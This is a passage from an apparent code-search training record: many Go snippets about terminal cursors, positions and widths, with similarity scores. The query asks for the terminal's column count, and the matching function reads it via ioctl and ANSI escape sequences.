rii < rsz; rii++ {\n\t\t\tc, _ := tv.Renders[cln].SpanPosToRuneIdx(si, rii)\n\t\t\trsp = mat32.Floor(tv.CharStartPos(TextPos{Ln: cln, Ch: c}).X - xoff)\n\t\t\trep = mat32.Ceil(tv.CharEndPos(TextPos{Ln: cln, Ch: c}).X - xoff)\n\t\t\t// fmt.Printf(\"trying c: %v for pt: %v xoff: %v rsp: %v, rep: %v\\n\", c, pt, xoff, rsp, rep)\n\t\t\tif pt.X >= int(rsp) && pt.X < int(rep) {\n\t\t\t\tcch = c\n\t\t\t\tgot = true\n\t\t\t\t// fmt.Printf(\"got cch: %v for pt: %v rsp: %v, rep: %v\\n\", cch, pt, rsp, rep)\n\t\t\t\tbreak\n\t\t\t} else if int(rep) > pt.X {\n\t\t\t\tcch = c\n\t\t\t\ttooBig = true\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t} else {\n\t\ttooBig = true\n\t}\n\tif !got && tooBig {\n\t\tri = rsz - 1\n\t\t// fmt.Printf(\"too big: %v\\n\", ri)\n\t\tfor rii := ri; rii >= 0; rii-- {\n\t\t\tc, _ := tv.Renders[cln].SpanPosToRuneIdx(si, rii)\n\t\t\trsp := mat32.Floor(tv.CharStartPos(TextPos{Ln: cln, Ch: c}).X - xoff)\n\t\t\trep := mat32.Ceil(tv.CharEndPos(TextPos{Ln: cln, Ch: c}).X - xoff)\n\t\t\t// fmt.Printf(\"too big: trying c: %v for pt: %v rsp: %v, rep: %v\\n\", c, pt, rsp, rep)\n\t\t\tif pt.X >= int(rsp) && pt.X < int(rep) {\n\t\t\t\tgot = true\n\t\t\t\tcch = c\n\t\t\t\t// fmt.Printf(\"got cch: %v for pt: %v rsp: %v, rep: %v\\n\", cch, pt, rsp, rep)\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n\treturn TextPos{Ln: cln, Ch: cch}\n}", "func (o *PrivateFeed) GetCursor() int32 {\n\tif o == nil || o.Cursor == nil {\n\t\tvar ret int32\n\t\treturn ret\n\t}\n\treturn *o.Cursor\n}", "func spCursor(ptr unsafe.Pointer) unsafe.Pointer {\n\treturn C.sp_cursor(ptr)\n}", "func (o *PrivilegeUsersResponse) GetBeforeCursorOk() (*string, bool) {\n\tif o == nil || o.BeforeCursor == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BeforeCursor, true\n}", "func (shell *POSIXShell) Commandline() (string, int) {\n\tline := shell.getenv(shell.commandLineBufferName)\n\tcursorString := shell.getenv(shell.commandLineCursorName)\n\tcursor, err := strconv.Atoi(cursorString)\n\tif err != nil {\n\t\treturn line, 0\n\t}\n\n\treturn line, cursor\n}", "func (s *swimmer) x() int {\n\treturn s.xPos\n}", "func (t *Textarea) GetSelectionStart() int {\n\treturn t.utf16ToUTF8Pos(t.Get(\"selectionStart\").Int())\n}", "func (w *WidgetImplement) Position() (int, int) {\n\treturn w.x, w.y\n}", "func (g *game) moveCursor(rowDelta, columnDelta int) {\n\tnewRow := g.selectedIndex.Row + rowDelta\n\tnewColumn := g.selectedIndex.Column + columnDelta\n\n\tif newRow >= 0 && newRow < g.Height && newColumn >= 0 && newColumn < g.Width {\n\t\tg.selectedIndex.Row = newRow\n\t\tg.selectedIndex.Column = newColumn\n\t\tg.Render()\n\t}\n}", "func MoveCursor(x int, y int) {\n\tfmt.Fprintf(Screen, \"\\033[%d;%dH\", y, x)\n}", "func GetLine(view *gocui.View) int {\n\tif view != nil {\n\t\t_, oy := view.Origin()\n\t\t_, cy := view.Cursor()\n\t\treturn oy + cy\n\t}\n\treturn 0\n}", "func (e Explorer) Position() int {\n\treturn e.position\n}", "func (touch *Touch) GetPosition() (float32, float32) {\n\treturn touch.X, touch.Y\n}", "func (i *InputHandler) GetMousePosition() Vector2 {\n\treturn NewVector2(float32(i.mouseX), float32(i.mouseY))\n}", "func (cmd Command) Position() int64 {\n\treturn cmd.GlobalPosition\n}", "func (s *Surface) Cursor() Cursor {\n\tc := s.Canvas.Get(\"style\").Get(\"cursor\").String()\n\tif c == \"\" {\n\t\treturn CursorDefault\n\t}\n\treturn Cursor(c)\n}", "func (o *LogsListRequestPage) GetCursor() string {\n\tif o == nil || o.Cursor == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Cursor\n}", "func (v *TextView) GetCursorLocations(iter *TextIter) (strong, weak *gdk.Rectangle) {\n\tvar strongRect, weakRect C.GdkRectangle\n\tC.gtk_text_view_get_cursor_locations(v.native(), iter.native(), &strongRect, &weakRect)\n\treturn gdk.WrapRectangle(uintptr(unsafe.Pointer(&strongRect))), gdk.WrapRectangle(uintptr(unsafe.Pointer(&weakRect)))\n}", "func MoveCursor(row int, column int) {\n\tfmt.Printf(CSI+CursorPositionSeq, row, column)\n}", "func (m *Model) CursorStart() {\n\tm.cursorStart()\n}", "func Point() int { // int32\n\treturn int(C.rl_point)\n}", "func (this *Window) GetPosition() (pos Vector2i) {\n\tpos.fromC(C.sfWindow_getPosition(this.cptr))\n\treturn\n}", "func GetHorizWallSpace(xx, yy int) int {\n\treturn getHorizWallSpace(xx, yy)\n}", "func (o *WObj) GetTopLeft() (float64, float64) {\n\tpnt := o.Hitbox.Min()\n\treturn pnt.X, pnt.Y\n}", "func (o *PrivilegeUsersResponse) SetBeforeCursor(v string) {\n\to.BeforeCursor = &v\n}", "func (e *Editor) Selection() (start, end int) {\n\treturn e.caret.start.ofs, e.caret.end.ofs\n}", "func CursorPrevLine(r uint) {\n\temitEscape(\"F\", r)\n}", "func (self *Graphics) OffsetX() int{\n return self.Object.Get(\"offsetX\").Int()\n}", "func (tm *Term) ScrollLeft() error {\n\ttm.ColSt = ints.MaxInt(tm.ColSt-1, 0)\n\treturn tm.Draw()\n}", "func (tb *Textbox) SetCursor(x, y int) error {\n\n\tif x < 0 || x > tb.width ||\n\t\ty < 0 || y > tb.height {\n\t\treturn errors.New(\"location out of bounds\")\n\t}\n\n\ttb.cursor = (y * len(tb.canvas[0])) + x\n\treturn nil\n}", "func MoveCursor(pos int, d int) []byte {\n\tp := []byte(fmt.Sprintf(\"%d\", pos))\n\treturn concat(open, p, dir[d])\n}", "func Move(x, y float32) {\n\tgContext.Cursor.X = x\n\tgContext.Cursor.Y = y\n}", "func (Screen *ScreenManager) MoveCursorRelative(XSpaces int, YSpaces int) {\n\tif XSpaces > 0 {\n\t\tScreen.MoveCursorDown(XSpaces)\n\t} else if XSpaces < 0 {\n\t\tScreen.MoveCursorUp(-XSpaces)\n\t}\n\tif YSpaces > 0 {\n\t\tScreen.MoveCursorForward(YSpaces)\n\t} else if XSpaces < 0 {\n\t\tScreen.MoveCursorBackward(-YSpaces)\n\t}\n}", "func (o *InputEventScreenTouch) GetPosition() gdnative.Vector2 {\n\t//log.Println(\"Calling InputEventScreenTouch.GetPosition()\")\n\n\t// Build out the method's arguments\n\tptrArguments := make([]gdnative.Pointer, 0, 0)\n\n\t// Get the method bind\n\tmethodBind := gdnative.NewMethodBind(\"InputEventScreenTouch\", \"get_position\")\n\n\t// Call the parent method.\n\t// Vector2\n\tretPtr := gdnative.NewEmptyVector2()\n\tgdnative.MethodBindPtrCall(methodBind, o.GetBaseObject(), ptrArguments, retPtr)\n\n\t// If we have a return type, convert it from a pointer into its actual object.\n\tret := gdnative.NewVector2FromPointer(retPtr)\n\treturn ret\n}", "func (b *PointerButton) Cursor() desktop.Cursor {\n\tif !b.Disabled() {\n\t\treturn desktop.PointerCursor\n\t}\n\treturn desktop.DefaultCursor\n}", "func ShowCursor() {\n\tfmt.Printf(CSI + ShowCursorSeq)\n}", "func (cl *ChapterList) GetCoords(maxX, maxY int) (x0, y0, x1, y1 int) {\n\treturn maxX / 2, (maxY - SearchBarHeight - 1) / 2, maxX - 1, maxY - SearchBarHeight - 2\n}", "func (t *Tile) Pos() (int, int) {\n\ti := t.Object.Int(\"index\")\n\tx := i % grid.ColCount\n\ty := i / grid.ColCount\n\treturn x, y\n}", "func (s *State) MousePos() image.Point {\n\treturn s.mousePos.Sub(s.bounds.Min)\n}", "func setCursorRow(row int) error {\n\t// todo: is this \"really\" needed?\n\t// if isatty.IsTerminal(os.Stdin.Fd()) {\n\t// \toldState, err := terminal.MakeRaw(0)\n\t// \tif err != nil {\n\t// \t\tpanic(err)\n\t// \t}\n\t// \tdefer terminal.Restore(0, oldState)\n\t// }\n\n\t// sets the cursor position where subsequent text will begin: <ESC>[{ROW};{COLUMN}H\n\t// great resource: http://www.termsys.demon.co.uk/vtansi.htm\n\t_, err := fmt.Fprintf(getScreen().output, \"\\x1b[%d;0H\", row)\n\treturn err\n}", "func (c *Cursor) First() {\n\tc.pos = c.start\n}", "func (p *Processor) GetConnectorPoint(procWidth int, isInput bool, port int) (x int, y int) {\n\ty = p.ProcessorDefinition.Y + port*(procConnWidth*2) + (procConnWidth * 4)\n\n\tif isInput {\n\t\tx = p.ProcessorDefinition.X + (procConnWidth / 2)\n\t\treturn x, y\n\t}\n\n\tx = p.ProcessorDefinition.X + procWidth - (procConnWidth / 2)\n\treturn x, y\n}", "func (r Rectangle) TopLeft() Point {\n\treturn r.Min\n}", "func (e Event) GetMouseButtonX() int {\n\treturn int(C.caca_get_event_mouse_x(e.Ev))\n}", "func getOrdinalOfCursor(curr *cursor) (ord uint64, err error) {\n\tif !curr.isLeaf() {\n\t\treturn 0, fmt.Errorf(\"|cur| must be at a leaf\")\n\t}\n\n\tord += uint64(curr.idx)\n\n\tfor curr.parent != nil {\n\t\tcurr = curr.parent\n\n\t\t// If a parent has been invalidated past end, act like we were at the\n\t\t// last subtree.\n\t\tif curr.idx >= curr.nd.Count() {\n\t\t\tcurr.skipToNodeEnd()\n\t\t} else if curr.idx < 0 {\n\t\t\treturn 0, fmt.Errorf(\"found invalid parent cursor behind node start\")\n\t\t}\n\n\t\tcurr.nd, err = curr.nd.loadSubtrees()\n\t\tif err != nil {\n\t\t\treturn 0, err\n\t\t}\n\n\t\tfor idx := curr.idx - 1; idx >= 0; idx-- {\n\t\t\tcnt, err := curr.nd.getSubtreeCount(idx)\n\t\t\tif err != nil {\n\t\t\t\treturn 0, err\n\t\t\t}\n\t\t\tord += cnt\n\t\t}\n\t}\n\n\treturn ord, nil\n}", "func (m *Model) cursorStart() bool {\n\treturn m.setCursor(0)\n}", "func HorizontalLine() string {\n\treturn strings.Repeat(\"-\", termcols)\n}", "func (t *Terminal) getMouseFocus(mouseX int) *Tab {\n\n\tfor _, tab := range t.activeTabs {\n\t\tif mouseX < tab.endX {\n\t\t\treturn tab\n\t\t}\n\t}\n\treturn nil\n}", "func showCursor() {\n\tfmt.Printf(\"\\033[?25h\")\n}" ]
[ "0.73878413", "0.712756", "0.7014254", "0.6883936", "0.6776131", "0.6621112", "0.6584309", "0.6405177", "0.6345664", "0.6337626", "0.62170935", "0.6178933", "0.6144976", "0.6053561", "0.60182124", "0.59999216", "0.59960705", "0.5993182", "0.59289753", "0.591452", "0.5882976", "0.58780426", "0.5875624", "0.5774766", "0.5746512", "0.5727804", "0.5710438", "0.5689453", "0.5682233", "0.56679153", "0.56392336", "0.5623066", "0.55999", "0.55975944", "0.5588704", "0.5576243", "0.5561894", "0.554351", "0.5529426", "0.5520043", "0.5512953", "0.5507232", "0.5494121", "0.5490687", "0.54888666", "0.54768664", "0.54444623", "0.5436628", "0.54303783", "0.54242545", "0.5421167", "0.5400081", "0.539595", "0.5385873", "0.53847796", "0.5381203", "0.53793305", "0.53745025", "0.5362756", "0.5359487", "0.5354832", "0.53481245", "0.5347301", "0.5329378", "0.53289926", "0.53262234", "0.5323239", "0.5321522", "0.5300194", "0.52932817", "0.5290284", "0.5271222", "0.52696425", "0.5267054", "0.5248027", "0.5245519", "0.5240573", "0.523921", "0.522862", "0.52221817", "0.5218311", "0.5201051", "0.5181772", "0.51812613", "0.51743025", "0.51695466", "0.5167739", "0.5165234", "0.5161818", "0.51546615", "0.5149834", "0.5146164", "0.51355875", "0.5134502", "0.51332855", "0.5131297", "0.5129745", "0.5126049", "0.51109695", "0.5107173", "0.51029736" ]
0.0
-1
Get the number of columns for the terminal. Assume defaultCols if it fails.
func getColumns(ifd, ofd int) int { // try using the ioctl to get the number of cols var winsize [4]uint16 _, _, err := syscall.Syscall(syscall.SYS_IOCTL, uintptr(syscall.Stdout), syscall.TIOCGWINSZ, uintptr(unsafe.Pointer(&winsize))) if err == 0 { return int(winsize[1]) } // the ioctl failed - try using the terminal itself start := getCursorPosition(ifd, ofd) if start < 0 { return defaultCols } // Go to right margin and get position if puts(ofd, "\x1b[999C") != 6 { return defaultCols } cols := getCursorPosition(ifd, ofd) if cols < 0 { return defaultCols } // restore the position if cols > start { puts(ofd, fmt.Sprintf("\x1b[%dD", cols-start)) } return cols }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (b Board) NumCols() int {\n\treturn b.ncols\n}", "func (v Chunk) NCols() int {\n\treturn len(v.buf.Columns)\n}", "func (fw *Writer) NumColumns() int { return fw.Schema.NumColumns() }", "func (A *Matrix64) Ncols() int {\n\treturn A.ncols\n}", "func (reader *Reader) GetNColumnIn() int {\n\treturn len(reader.InputMetadata)\n}", "func (s *Simplex) getColumnsLength() int {\n\tcount := 1 // one for RH\n\tcount += len(s.LP.ObjectiveFunction.Variables) //one for each variable\n\tfor _, c := range s.LP.Constraints {\n\t\tswitch c.Operator {\n\t\tcase \"<=\", \"=\":\n\t\t\tcount++ //one artificial\n\t\tcase \">=\":\n\t\t\tcount += 2 //one slack, one artificial\n\t\t}\n\t}\n\treturn count\n}", "func terminalWidth() (int, error) {\n\techoLockMutex.Lock()\n\tdefer echoLockMutex.Unlock()\n\n\tfd := int(tty.Fd())\n\n\tws, err := unix.IoctlGetWinsize(fd, unix.TIOCGWINSZ)\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\n\treturn int(ws.Col), nil\n}", "func (t *Table) Cols() int {\n\treturn len(t.ColDefs)\n}", "func (g *Game) Cols() int {\n\treturn int(g.cols)\n}", "func getConsoleSize() (int, int) {\n cols, rows, err := terminal.GetSize(0)\n if err != nil {\n rows = 24\n cols = 80\n }\n return rows, cols\n}", "func countColumns(node *blackfriday.Node) int {\n\tvar columns int\n\n\tnode.Walk(func(node *blackfriday.Node, entering bool) blackfriday.WalkStatus {\n\t\tswitch node.Type {\n\t\tcase blackfriday.TableRow:\n\t\t\tif !entering {\n\t\t\t\treturn blackfriday.Terminate\n\t\t\t}\n\t\tcase blackfriday.TableCell:\n\t\t\tif entering {\n\t\t\t\tcolumns++\n\t\t\t}\n\t\tdefault:\n\t\t}\n\t\treturn blackfriday.GoToNext\n\t})\n\treturn columns\n}", "func (m M) Cols() int {\n\treturn m.c\n}", "func GetMaxColumns() int {\r\n\treturn converter.StrToInt(SysString(MaxColumns))\r\n}", "func (matrix *Matrix) getNumCols() int {\n\treturn matrix.NumCols\n}", "func (A *CSRMatrix64) Ncols() int {\n\tif A.transposed {\n\t\treturn A.nrows\n\t} else {\n\t\treturn A.ncols\n\t}\n}", "func TableGetColumnCount() int {\n\treturn int(C.iggTableGetColumnCount())\n}", "func (A *SymmetrizedMatrix64) Ncols() int {\n\treturn A.a.Ncols()\n}", "func (self *T) Cols() int {\n\treturn 2\n}", "func terminalWidth() (int, error) {\n\treturn 0, errors.New(\"Not supported\")\n}", "func (m *matrixComplex) GetNumCols() int { return m.numCols }", "func (A *AugmentedSparseMatrix64) Ncols() int {\n\treturn A.a.Nrows() + A.a.Ncols()\n}", "func (ref *UIElement) ColumnCount() int64 {\n\tret, _ := ref.Int64Attr(ColumnCountAttribute)\n\treturn ret\n}", "func (s *Statement) Columns() int {\n\treturn int(C.sqlite3_column_count(s.cptr))\n}", "func (self *T) Cols() int {\n\treturn 1\n}", "func (A *Matrix) Cols() int {\n\treturn A.width\n}", "func terminalWidth() (int, error) {\n\treturn 0, errors.New(\"Not Supported\")\n}", "func (v *TreeModel) GetNColumns() int {\n\tc := C.gtk_tree_model_get_n_columns(v.native())\n\treturn int(c)\n}", "func TerminalWidth() int {\n\ttype winsize struct {\n\t\tRow uint16\n\t\tCol uint16\n\t\tXpixel uint16\n\t\tYpixel uint16\n\t}\n\tws := &winsize{}\n\tretCode, _, _ := syscall.Syscall(syscall.SYS_IOCTL,\n\t\tuintptr(syscall.Stdin),\n\t\tuintptr(syscall.TIOCGWINSZ),\n\t\tuintptr(unsafe.Pointer(ws)))\n\tif int(retCode) == -1 {\n\t\treturn DefaultTerminalWidth\n\t}\n\treturn int(ws.Col)\n}", "func TerminalWidth() (int, error) {\n\tw := new(window)\n\tres, _, err := syscall.Syscall(sysIoctl,\n\t\ttty.Fd(),\n\t\tuintptr(syscall.TIOCGWINSZ),\n\t\tuintptr(unsafe.Pointer(w)),\n\t)\n\tif int(res) == -1 {\n\t\treturn 0, err\n\t}\n\treturn int(w.Col), nil\n}", "func (col Columns) Len() int {\n\tif col.NumLevels() == 0 {\n\t\treturn 0\n\t}\n\treturn col.Levels[0].Len()\n}", "func (g *NormalGrid) Cols() int {\n\treturn g.cols\n}", "func getIndexColumnLength(col *model.ColumnInfo, colLen int) (int, error) {\n\tlength := types.UnspecifiedLength\n\tif colLen != types.UnspecifiedLength {\n\t\tlength = colLen\n\t} else if col.GetFlen() != types.UnspecifiedLength {\n\t\tlength = col.GetFlen()\n\t}\n\n\tswitch col.GetType() {\n\tcase mysql.TypeBit:\n\t\treturn (length + 7) >> 3, nil\n\tcase mysql.TypeVarchar, mysql.TypeString, mysql.TypeVarString, mysql.TypeTinyBlob, mysql.TypeMediumBlob, mysql.TypeBlob, mysql.TypeLongBlob:\n\t\t// Different charsets occupy different numbers of bytes on each character.\n\t\tdesc, err := charset.GetCharsetInfo(col.GetCharset())\n\t\tif err != nil {\n\t\t\treturn 0, dbterror.ErrUnsupportedCharset.GenWithStackByArgs(col.GetCharset(), col.GetCollate())\n\t\t}\n\t\treturn desc.Maxlen * length, nil\n\tcase mysql.TypeTiny, mysql.TypeInt24, mysql.TypeLong, mysql.TypeLonglong, mysql.TypeDouble, mysql.TypeShort:\n\t\treturn mysql.DefaultLengthOfMysqlTypes[col.GetType()], nil\n\tcase mysql.TypeFloat:\n\t\tif length <= mysql.MaxFloatPrecisionLength {\n\t\t\treturn mysql.DefaultLengthOfMysqlTypes[mysql.TypeFloat], nil\n\t\t}\n\t\treturn mysql.DefaultLengthOfMysqlTypes[mysql.TypeDouble], nil\n\tcase mysql.TypeNewDecimal:\n\t\treturn calcBytesLengthForDecimal(length), nil\n\tcase mysql.TypeYear, mysql.TypeDate, mysql.TypeDuration, mysql.TypeDatetime, mysql.TypeTimestamp:\n\t\treturn mysql.DefaultLengthOfMysqlTypes[col.GetType()], nil\n\tdefault:\n\t\treturn length, nil\n\t}\n}", "func (mc MultiCursor) MaxCol() int {\n\tmaxCol := 0\n\tfor _, cursor := range mc.cursors {\n\t\tif cursor.col > maxCol {\n\t\t\tmaxCol = cursor.col\n\t\t}\n\t}\n\treturn maxCol\n}", "func (l LogReader) GetColumnSizes() []int {\n\tsizes := make([]int, len(l.config.Headers))\n\tfor index, header := range l.config.Headers {\n\t\tsizes[index] = header.Size\n\t}\n\treturn sizes\n}", "func (d *Dense) Columns() int {\n\treturn d.columns\n}", "func (board *Board) Len() int {\n\treturn board.Dimension * board.Dimension\n}", "func (v *IconView) GetColumns() int {\n\treturn int(C.gtk_icon_view_get_columns(v.native()))\n}", "func (t *Table2dMessage) Length() int {\n\treturn t.max[0] + t.max[1] + len(t.colSep)\n}", "func maxColumns(addends []string, answer string) int {\n\tmax := 0\n\n\tfor _, addend := range addends {\n\t\tif len(addend) > max {\n\t\t\tmax = len(addend)\n\t\t}\n\t}\n\n\tif len(answer) > max {\n\t\tmax = len(answer)\n\t}\n\n\treturn max\n}", "func (m *matrix) GetColumns() int {\n\treturn m.cols\n}", "func TermInfo() (cols, lines int, err error) {\n\tcolsBytes, err := sh.Command(\"tput\", \"cols\").Output()\n\tif err != nil {\n\t\treturn 0, 0, err\n\t}\n\n\tlinesBytes, err := sh.Command(\"tput\", \"lines\").Output()\n\tif err != nil {\n\t\treturn 0, 0, err\n\t}\n\n\tcols, err = strconv.Atoi(string(colsBytes[:len(colsBytes)-1]))\n\tif err != nil {\n\t\treturn 0, 0, err\n\t}\n\n\tlines, err = strconv.Atoi(string(linesBytes[:len(linesBytes)-1]))\n\tif err != nil {\n\t\treturn 0, 0, err\n\t}\n\n\treturn cols, lines, nil\n}", "func (t *ThrottleTerminal) Len() int {\n\tif t.lineMax == 0 {\n\t\tlineLen := TerminalWidth()\n\t\tif lineLen < 2 {\n\t\t\tlineLen = 80 // we don't expect this to fail, but let's not create a nightmare\n\t\t}\n\t\tt.lineMax = lineLen - 1\n\t}\n\treturn t.lineMax + 1\n}", "func NumColumns(t sql.Type) int {\n\tv, ok := t.(TupleType)\n\tif !ok {\n\t\treturn 1\n\t}\n\treturn len(v)\n}", "func (p asciiTable) Dims() (c, r int) {\n\treturn p.colLen, p.rowLen\n}", "func CountHaloes(icols [][]int, fcols [][]float64) int {\n\tif len(icols) > 0 {\n\t\treturn len(icols[0])\n\t} else if len(fcols) > 0 {\n\t\treturn len(fcols[0])\n\t}\n\tpanic(\"No columns in config file.\")\n}", "func (c *StatsTableRowCache) GetColLength(id tableHistID) uint64 {\n\tc.mu.RLock()\n\tdefer c.mu.RUnlock()\n\treturn c.colLength[id]\n}", "func (col Columns) NumLevels() int {\n\treturn len(col.Levels)\n}", "func (c *Console) Column(n Int) *Console {\n\tPrint(_CSI + n.ToString() + \"G\")\n\treturn c\n}", "func colFromPosition(pos int) int {\n return pos % 8\n}", "func (m *TuiModel) GetColumn() int {\n\treturn m.mouseEvent.X / m.CellWidth()\n}", "func (c *Console) Len() uint16 {\n\tif len(c.input) > 0 {\n\t\treturn 1\n\t}\n\treturn 0\n}", "func (this *Source) LineColumn(pos int) (int, int) {\n lineNum := 1 + this.LineOffset\n colNum := 0\n text := this.Text\n justReadCR := false\n for i := 0; i < pos; i++ {\n c := text[i]\n if c == '\\r' {\n lineNum++\n colNum = 0\n justReadCR = true\n } else if c == '\\n' {\n if !justReadCR {\n lineNum++\n colNum = 0\n }\n justReadCR = false\n } else {\n colNum++\n justReadCR = false\n }\n }\n return lineNum, colNum\n}", "func (t colType) length() (int64, bool) {\n\tif !t.valid ||\n\t\tt.options&hasPrec != 0 || t.options&hasScale != 0 {\n\t\treturn 0, false\n\t}\n\n\t// long types\n\tif t.options&isLong != 0 {\n\t\tif t.dataType == longCharType {\n\t\t\treturn int64(t.size / 2), true\n\t\t}\n\t\tif t.encodingProps.scanType == reflect.TypeOf(\"\") {\n\t\t\treturn int64(t.size), true\n\t\t}\n\t\treturn math.MaxInt32, true\n\t}\n\n\treturn int64(t.size), t.options&hasLength != 0\n}", "func calculateNumberOfFloorsPerColumn(b *Battery) int {\n\tb.numberOfFloors = b.totalNumberOfFloors - b.numberOfBasements\n\n\tif b.numberOfBasements > 0 { //if there is basement floors\n\t\tb.numberOfFloorsPerColumn = (b.numberOfFloors / (b.numberOfColumns - 1)) //the first column serves the basement floors\n\t} else { //if there is no basement\n\t\tb.numberOfFloorsPerColumn = (b.numberOfFloors / b.numberOfColumns)\n\t}\n\n\treturn b.numberOfFloorsPerColumn\n}", "func (matrix *XGDMatrix) NumCol() (uint32, error) {\n\tvar count C.bst_ulong\n\tif err := checkError(C.XGDMatrixNumCol(matrix.handle, &count)); err != nil {\n\t\treturn 0, err\n\t}\n\n\treturn uint32(count), nil\n}", "func (this *TableCol) LineCount(maxWidth ...int) int {\n\tif len(maxWidth) == 0 || maxWidth[0] == 0 {\n\t\treturn this.lineCount\n\t}\n\treturn strings.Count(this.Content(maxWidth[0]), \"\\n\") + 1\n}", "func (p Pretty) GetTermSize() error {\n\tif runtime.GOOS == \"windows\" {\n\t\tsizes := runCmdCommand(\"mode\", \"con\")\n\t\tfor _, s := range strings.Split(sizes, \"\\r\\n\") {\n\t\t\tif strings.Contains(s, \"Columns\") {\n\t\t\t\tsize := strings.TrimFunc(s, func(r rune) bool {\n\t\t\t\t\treturn !unicode.IsNumber(r)\n\t\t\t\t})\n\t\t\t\tw, err := strconv.ParseInt(size, 10, 32)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatal(err)\n\t\t\t\t}\n\t\t\t\tp.Terminal.Width = int(w)\n\t\t\t} else if strings.Contains(s, \"Lines\") {\n\t\t\t\tsize := strings.TrimFunc(s, func(r rune) bool {\n\t\t\t\t\treturn !unicode.IsNumber(r)\n\t\t\t\t})\n\t\t\t\th, err := strconv.ParseInt(size, 10, 32)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatal(err)\n\t\t\t\t}\n\t\t\t\tp.Terminal.Height = int(h)\n\t\t\t}\n\t\t}\n\t} else {\n\t\treturn fmt.Errorf(\"Sorry, there currently doesn't seem to have support for %v. Please add a bug/feature request on github! (%v)\", runtime.GOOS, bugReportURL)\n\t}\n\n\treturn nil\n}", "func terminalWidth() (width int, err error) {\n\tvar info consoleScreenBufferInfo\n\t_, _, e := syscall.Syscall(procGetConsoleScreenBufferInfo.Addr(), 2, uintptr(syscall.Stdout), uintptr(unsafe.Pointer(&info)), 0)\n\tif e != 0 {\n\t\treturn 0, error(e)\n\t}\n\treturn int(buffer.dwSize.X), nil\n}", "func (m *Model) ColumnCount() int {\n\treturn len(m.Columns)\n}", "func cmdLen(cmd float64) int {\n\tswitch cmd {\n\tcase moveToCmd, lineToCmd, closeCmd:\n\t\treturn 3\n\tcase quadToCmd:\n\t\treturn 5\n\tcase cubeToCmd, arcToCmd:\n\t\treturn 7\n\tcase nullCmd:\n\t\treturn 0\n\t}\n\tpanic(fmt.Sprintf(\"unknown path command '%f'\", cmd))\n}", "func TerminalSize(out *os.File) (int, int, error) {\n\tws := new(winsize)\n\n\t_, _, err := syscall.Syscall(syscall.SYS_IOCTL, out.Fd(),\n\t\tuintptr(syscall.TIOCGWINSZ), uintptr(unsafe.Pointer(ws)))\n\tif err != 0 {\n\t\treturn 0, 0, err\n\t}\n\treturn int(ws.cols), int(ws.rows), nil\n}", "func (yylex *lexer) Column() int {\n return yylex.stack[len(yylex.stack) - 1].column\n}", "func (l *Lexer) GetLineColumn(i int) (line, col int) {\n\tline, col = 1, 1\n\tfor j := 0; j < i; j++ {\n\t\tswitch l.I[j] {\n\t\tcase '\\n':\n\t\t\tline++\n\t\t\tcol = 1\n\t\tcase '\\t':\n\t\t\tcol += 4\n\t\tdefault:\n\t\t\tcol++\n\t\t}\n\t}\n\treturn\n}", "func (l *Lexer) GetLineColumn(i int) (line, col int) {\n\tline, col = 1, 1\n\tfor j := 0; j < i; j++ {\n\t\tswitch l.I[j] {\n\t\tcase '\\n':\n\t\t\tline++\n\t\t\tcol = 1\n\t\tcase '\\t':\n\t\t\tcol += 4\n\t\tdefault:\n\t\t\tcol++\n\t\t}\n\t}\n\treturn\n}", "func Width() (int, error) {\n\tws := &struct {\n\t\tRow uint16\n\t\tCol uint16\n\t\tXpixel uint16\n\t\tYpixel uint16\n\t}{}\n\n\tretCode, _, errno := syscall.Syscall(syscall.SYS_IOCTL,\n\t\tuintptr(syscall.Stdin),\n\t\tuintptr(syscall.TIOCGWINSZ),\n\t\tuintptr(unsafe.Pointer(ws)),\n\t)\n\n\tif int(retCode) == -1 {\n\t\treturn -1, errno\n\t}\n\n\treturn int(ws.Col), nil\n}", "func (p *StreamParser) Column() int {\n\treturn p.machine.Column()\n}", "func Width() int {\n\tws, err := getWinsize()\n\n\tif err != nil {\n\t\treturn -1\n\t}\n\n\treturn int(ws.Col)\n}", "func (d *maxCountChannelDao) GetColumns(prefix ...string) string {\n\tdata := gconv.MapStrStr(d.Columns)\n\treturn helper.FormatSelectColumn(data, prefix...)\n}", "func (r Row) Len() int {\n\treturn r.c.NumCols()\n}", "func (lexer *Lexer) nextCol() {\n lexer.position.Col++\n}", "func GetTerminalWidth() int {\n\twidth, _ := GetTerminalSize()\n\treturn width\n}", "func (f *FlagSet) ArgsLenAtDash() int {\n\treturn f.argsLenAtDash\n}", "func getTermWidth() int {\n\tresult, _, err := terminal.GetSize(int(os.Stdout.Fd()))\n\tif err != nil {\n\t\tfmt.Fprintf(os.Stderr, \"%s\\n\", err.Error())\n\t\treturn 200\n\t}\n\n\treturn result\n}", "func printColumns(w io.Writer) {\n\tdefer fmt.Fprintln(w, \"\")\n\tp := func(s string) {\n\t\tfmt.Fprintf(w, fmt.Sprintf(\"%s\\t\", s))\n\t}\n\n\ttermWidth := getTermWidth()\n\n\tif termWidth > len(\"Name\") {\n\t\tp(\"Name\")\n\t}\n\n\tif termWidth > minSizeLen {\n\t\tp(\"Size\")\n\t}\n\n\tif termWidth > minAgeLen {\n\t\tp(\"Age\")\n\t}\n\n\tif termWidth > minDueLenShort {\n\t\tp(\"Due\")\n\t}\n\n\tif termWidth > minTagLen {\n\t\tp(\"Tag\")\n\t}\n\n\tif termWidth > minURLLen {\n\t\tp(\"\")\n\t}\n}", "func get_term_size(fd uintptr) (int, int) {\n var sz winsize\n _, _, _ = syscall.Syscall(syscall.SYS_IOCTL,\n fd, uintptr(syscall.TIOCGWINSZ), uintptr(unsafe.Pointer(&sz)))\n return int(sz.Col), int(sz.Row)\n}", "func (w *Writer) GetTermDimensions() (int, int) {\n\tf, ok := io.Writer(w.Out).(*os.File)\n\tif !ok {\n\t\treturn 80, 25\n\t}\n\tfd := f.Fd()\n\tvar csbi consoleScreenBufferInfo\n\tprocGetConsoleScreenBufferInfo.Call(fd, uintptr(unsafe.Pointer(&csbi)))\n\treturn int(csbi.maximumWindowSize.x), int(csbi.maximumWindowSize.y)\n}", "func (fn *formulaFuncs) COLUMNS(argsList *list.List) formulaArg {\n\tif 